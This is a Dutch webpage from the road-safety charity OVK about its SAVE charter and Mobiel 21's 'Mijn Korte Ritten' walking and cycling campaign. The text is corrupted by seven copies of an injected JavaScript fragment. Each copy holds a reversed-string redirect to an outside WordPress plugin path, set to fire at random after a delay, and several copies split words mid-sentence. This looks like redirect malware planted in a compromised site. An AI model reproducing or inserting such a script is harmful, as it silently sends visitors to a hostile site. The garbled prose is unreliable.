Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Campagne ‘Mijn Korte Ritten’, een initiatief van Mobiel 21

Steven Goegebeur, bekend van het populaire TV-programma Foute Vrienden op 2BE,  wil Vlaanderen aan het fietsen en stappen krijgen met een leuke podcast waarin hij 15 minuten volpraat met leuke anekdotes en grappige verhalen; de podcast als gezelschap op jouw gezonde en leuke toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocht. Het filmpje waarin Steven de podcast al eens demonstreert,vind je hier. De podcasts zelf kan je vanaf de start van de campagne downloaden via www.mijnkorteritten.be.

Het filmpje kadert in de gratis campagne Mijn korte ritten. Met de campagne wil Mobiel 21, een organisatie voor duurzame mobiliteit, het stappen en fietsen voor korte afstanden toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot vijf kilometer stimuleren. De gratis campagne loopt elk jaar van 21 maart toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot 21 april.

Door ritten met de fiets of te voet te registreren op de campagnewebsite van Mijn korte ritten, zien deelnemers onmiddellijk hoeveel uitstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toot ze vermeden hebben, hoeveel kosten bespaard en hoeveel extra calorieën ze verbrand hebben. Iedereen die actief meedoet, maakt bovendien kans op een prijs, ongeacht hoeveel kilometers je doet.

In 2013 deden er 1386 deelnemers mee uit 24 verschillende gemeenten en bespaarden die samen 14.725 korte autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toritten oftewel 102.740 km. Na de campagne voerde de organisatie een korte deelnemersbevraging bij meer dan 300 respondenten. Daaruit bleek wat de redenen waren om deel te nemen aan de campagne. Milieuredenen, plezier en gezondheid spanden de kroon.

Vorig jaar haalde de gemeente Aartselaar in samenwerking met de plaatselijke Fietsersbond een bijzonder goede score met maar liefst 226 deelnemers en 13.193 kilometer aan korte ritten. Dit jaar daagt Aartselaar alle andere steden en gemeenten uit om het beter te doen en hen als absolute toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topfavoriet te verslaan. Tienen en Deinze vervolledigden vorig jaar de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top drie.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be